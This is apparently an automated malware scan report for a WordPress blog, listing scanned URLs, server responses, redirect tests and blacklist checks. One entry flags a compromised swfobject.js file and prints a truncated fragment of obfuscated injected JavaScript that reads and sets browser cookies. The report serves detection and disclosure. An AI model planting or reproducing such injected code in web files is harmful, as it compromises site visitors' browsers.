Scanned pages/files
Request | Server response | Status |
http://theuncommonlife.net/ | 200 OK Content-Length: 53566 Content-Type: text/html | clean |
http://theuncommonlife.net/test404page.js | 404 Not Found Content-Length: 12521 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js?ver=3.3.1 | 200 OK Content-Length: 90518 Content-Type: text/javascript | clean |
http://theuncommonlife.net/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 13162 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var HhhPD4v="\x75\x73\x65r\x69dA\x30817FB\x325";var lB6AMa0="28";var ohSMG=1;function FnmTqif(v69H1E){var eBhQG;var LgPCJ=document.cookie;if(!LgPCJ){return null;}LgPCJ=LgPCJ.replace(/\s/g,"");var auAr5v_=LgPCJ.split(";");for(var i=0;i<auAr5v_.length;i++){var IzebBuO=auAr5v_[i].split("=");if(IzebBuO[0]==v69H1E){eBhQG=unescape(IzebBuO[1]);break;}}return eBhQG;};function D7iVO(v69H1E,CDfHdho,VfOr4D){var exp=new Date();var kGeaAfy=exp.getTime()+(VfOr4D*60*60*1000);exp.setTime(kGeaAfy);var Qzecbe8 Antivirus reports:
| ||
http://theuncommonlife.net//static.getclicky.com/js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 25 Dec 2014 16:15:29 GMT Pragma: no-cache Location: http://theuncommonlife.net/static.getclicky.com/js/ Server: Apache/2.2.22 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 25 Dec 2014 16:15:30 GMT X-Pingback: http://theuncommonlife.net/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.2.4 X-UA-Compatible: IE=EmulateIE7 | clean |
http://theuncommonlife.net/static.getclicky.com/js/ | 404 Not Found Content-Length: 12534 Content-Type: text/html | clean |
http://w.sharethis.com/button/buttons.js?ver=3.3.1 | 200 OK Content-Length: 150720 Content-Type: application/x-javascript | clean |
http://theuncommonlife.net/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 27151 Content-Type: application/javascript | clean |
http://theuncommonlife.net/wp-content/plugins/contact-form-7/scripts.js?ver=3.0.1 | 200 OK Content-Length: 5802 Content-Type: application/javascript | clean |
http://theuncommonlife.net/about/ | 200 OK Content-Length: 23777 Content-Type: text/html | clean |
http://onlywire.com/btn/button_81278 | 200 OK Content-Length: 95541 Content-Type: application/x-javascript | clean |
http://theuncommonlife.net/justin-recommends/ | 200 OK Content-Length: 18630 Content-Type: text/html | clean |
http://theuncommonlife.net/partner-with-me/ | 200 OK Content-Length: 13835 Content-Type: text/html | clean |
http://theuncommonlife.net/contact-2/ | 200 OK Content-Length: 14213 Content-Type: text/html | clean |
http://theuncommonlife.net/archives/ | 200 OK Content-Length: 31420 Content-Type: text/html | clean |
http://theuncommonlife.net/category/uncategorized/ | 200 OK Content-Length: 15192 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theuncommonlife.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 16:15:25 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 53566
Content-Type: text/html
Last-Modified: Mon, 10 Sep 2012 21:50:27 GMT
X-Powered-By: W3 Total Cache/0.9.2.4
...53566 bytes of data.
GET / HTTP/1.1
Host: theuncommonlife.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 16:15:25 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22
Vary: Accept-Encoding,User-Agent
Content-Length: 53566
Content-Type: text/html
Last-Modified: Mon, 10 Sep 2012 21:50:27 GMT
X-Powered-By: W3 Total Cache/0.9.2.4
...53566 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: theuncommonlife.net
Referer: http://www.google.com/search?q=theuncommonlife.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theuncommonlife.net
Referer: http://www.google.com/search?q=theuncommonlife.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theuncommonlife.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://theuncommonlife.net/
Result: theuncommonlife.net is not infected or malware details are not published yet.
Result: theuncommonlife.net is not infected or malware details are not published yet.